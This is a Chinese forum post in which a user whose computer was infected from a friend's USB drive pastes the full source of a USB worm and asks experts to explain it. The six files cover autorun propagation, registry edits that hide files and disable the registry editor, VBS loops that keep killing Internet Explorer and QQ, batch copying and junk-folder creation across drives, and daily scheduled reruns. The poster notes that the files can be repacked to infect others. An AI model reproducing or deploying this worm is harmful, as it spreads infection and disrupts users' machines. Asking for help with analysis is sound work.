我是双硬盘,一个装的XP,另一个刚装好vista,一个朋友在我电脑上用了一阵,病毒从他U盘传到了我的电脑,我发现病毒没有封装,就解压看,最终是这六个文件:autorun.inf, cmd.vbs, hiden.reg, ie.vbs, qq.vbs, terrible.bat,用RAR压缩成自己解压包,只要别人一运行,就会感染。我用记事本打开,代码如下:
autorun.inf
[AutoRun]
open=hitler314.exe
shell\open=打开(&O)
shell\open\Command=hitler314
shell\explore=资源管理器(&X)
shell\explore\Command="hitler314 -e"病毒源代码及后遗证---盼大师破解
cmd.vbs
Set shell = Wscript.create
object("wscript.shell")
a = shell.run ("terrible.bat",0)
hiden.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=-
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"="0x00000000"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000001
ie.vbs
dim bag,pipe,honker,good
do
good="."
set bag=get
object("winmgmts:\\"&good&"\root\cimv2")
set pipe=bag.execquery("select * from win32_process where name='IEXPLORE.EXE'")
for each i in pipe
i.terminate()
next
wscript.sleep 1
loop
qq.vbs
dim bag,pipe,honker,good
do
good="."
set bag=get
object("winmgmts:\\"&good&"\root\cimv2")
set pipe=bag.execquery("select * from win32_process where name='QQ.exe'")
for each i in pipe
i.terminate()
next
wscript.sleep 1
loop
terrible.bat
@regedit.exe /s hiden.reg
@mkdir d:\.......\
@mkdir e:\.......\
@mkdir f:\.......\
@mkdir g:\.......\
@mkdir h:\.......\
@mkdir i:\.......\
@mkdir j:\.......\
@mkdir k:\.......\
@mkdir l:\.......\
@mkdir m:\.......\
@mkdir n:\.......\
@mkdir o:\.......\
@copy autorun.inf d:\
@copy autorun.inf e:\
@copy autorun.inf f:\
@copy autorun.inf g:\
@copy autorun.inf h:\
@copy autorun.inf i:\
@copy autorun.inf j:\
@copy autorun.inf k:\
@copy autorun.inf l:\
@copy autorun.inf m:\
@copy autorun.inf n:\
@copy autorun.inf o:\
@copy hitler314.exe d:\.......\
@copy hitler314.exe e:\.......\
@copy hitler314.exe f:\.......\
@copy hitler314.exe g:\.......\
@copy hitler314.exe h:\.......\
@copy hitler314.exe i:\.......\
@copy hitler314.exe j:\.......\
@copy hitler314.exe k:\.......\
@copy hitler314.exe l:\.......\
@copy hitler314.exe m:\.......\
@copy hitler314.exe n:\.......\
@copy hitler314.exe o:\.......\
@md d:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1..\
@md d:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!2..\
@md d:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!3..\
@md d:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!4..\
@md d:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!5..\
@md e:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!59..\
@md e:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!60..\
@md e:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!61..\
@md e:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!62..\
@md e:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!63..\
@md e:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!64..\
@md e:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!65..\
@md e:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!66..\
@md h:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!48..\
@md h:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!49..\
@md h:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!50..\
@md h:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!51..\
@md h:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!52..\
@md h:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!53..\
@md h:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!54..\
@md i:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!78..\
@md i:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!79..\
@md i:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!80..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!54..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!55..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!56..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!57..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!58..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!59..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!60..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!61..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!94..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!95..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!96..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!97..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!98..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!99..\
@d:\ie.vbs
@d:\qq.vbs
@del hitler314.exe /f /q
@del ie.vbs /f /q
@del qq.vbs /f /q
@del hiden.reg /f /q
@del cmd.vbs /f /q
at 21:00 /every:M,T,W,Th,F,S,Su d:\.......\cmd.vbs
at 19:00 /every:M,T,W,Th,F,S,Su e:\.......\cmd.vbs
at 22:00 /every:M,T,W,Th,F,S,Su f:\.......\cmd.vbs
at 23:00 /every:M,T,W,Th,F,S,Su g:\.......\cmd.vbs
at 16:00 /every:M,T,W,Th,F,S,Su h:\.......\cmd.vbs
@shutdown.bat
cls
我只能看明白最后一个文件和那个注册表文件,其它几个文件看不懂,烦请大师破译一下!
